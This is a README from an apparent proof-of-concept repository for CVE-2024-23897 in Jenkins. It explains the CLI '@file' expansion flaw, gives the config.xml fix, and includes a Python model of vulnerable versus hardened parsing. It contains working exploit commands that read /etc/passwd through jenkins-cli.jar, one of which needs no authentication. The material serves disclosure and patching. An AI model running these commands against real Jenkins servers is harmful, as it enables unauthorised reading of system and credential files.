10T4 / PoC-Fix-jenkins-rce_CVE-2024-23897

on this git you can find all information on the CVE-2024-23897


Introduction

The issue, assigned the CVE identifier CVE-2024-23897, has been described as an arbitrary file read vulnerability through the built-in command line interface. The CLI's command parser has a feature that replaces an @ character followed by a file path in an argument with the file's contents (expandAtFiles). This feature is enabled by default, and Jenkins 2.441 and earlier and LTS 2.426.2 and earlier do not disable it.

PoC

For this PoC, I installed Jenkins 2.426.2 with Docker to test the exploitation of the vulnerability:

docker run -p 8080:8080 -p 50000:50000 -v jenkins_home:/var/jenkins_home jenkins/jenkins:2.426.2

After creating a user and a password, I downloaded the Jenkins CLI client (jenkins-cli.jar) on my attacking machine.


Then I wrote the command for the exploit. This command requires the credentials of a Jenkins user:

java -jar jenkins-cli.jar -s http://192.168.1.45:8080/ -auth "user:aze+123" connect-node "@/etc/passwd"

Another command allows displaying the first lines of a file without authentication:

java -jar jenkins-cli.jar -noCertificateCheck -s 'http://192.168.1.45:8080' help "@/etc/passwd"

Fix the vulnerability

To counter this vulnerability, navigate to the Jenkins configuration file named config.xml (in my case it is located inside my Docker container, so I open a shell in the container)

and add the line:

<expandAtFiles>false</expandAtFiles>

and restart Jenkins:

service jenkins restart
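To show why the "@file" expansion described in the introduction leaks file content and why the expandAtFiles setting above removes the problem, here is an added model of the behaviour (this is illustration code written for this README, not Jenkins or args4j code): every argument starting with "@" is replaced by the lines of the named file, one line per argument, and a command that echoes an unknown argument back in its error message then reveals the first line. The command table and the file it reads are constructed for the demo.

```python
import os
import tempfile


def expand_at_files(args, expand_at_files_enabled=True):
    """Return the argument list after '@file' expansion.

    expand_at_files_enabled=True models the vulnerable default, where an
    argument '@/path' is replaced by the lines of /path (one argument per
    line). False models the hardened configuration (expandAtFiles disabled),
    where '@/path' stays a literal argument and no file is opened.
    """
    result = []
    for arg in args:
        if expand_at_files_enabled and arg.startswith("@"):
            with open(arg[1:], "r", encoding="utf-8") as fh:
                result.extend(line.rstrip("\n") for line in fh)
        else:
            result.append(arg)
    return result


def run_help(args, expand_at_files_enabled=True):
    """Model of a 'help <command>' handler (assumed, not the real one).

    Unknown command names are echoed back in the error text, which is the
    channel through which the first line of the expanded file leaks.
    """
    expanded = expand_at_files(args, expand_at_files_enabled)
    if not expanded:
        return "usage: help [COMMAND]"
    if expanded[0] in ("help", "who-am-i"):  # constructed command table
        return f"{expanded[0]}: ok"
    return f"ERROR: No such command {expanded[0]}"


def demo():
    """Run the same request against the vulnerable and hardened parser."""
    # Constructed file standing in for a file the CLI should never read.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as tmp:
        tmp.write("secret-line-1\nsecret-line-2\n")
        path = tmp.name
    try:
        vulnerable = run_help(["@" + path])
        hardened = run_help(["@" + path], expand_at_files_enabled=False)
    finally:
        os.unlink(path)
    return vulnerable, hardened


if __name__ == "__main__":
    leaked, safe = demo()
    print("expansion enabled :", leaked)   # error text contains the file's first line
    print("expansion disabled:", safe)     # error text contains only the literal "@..."
```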
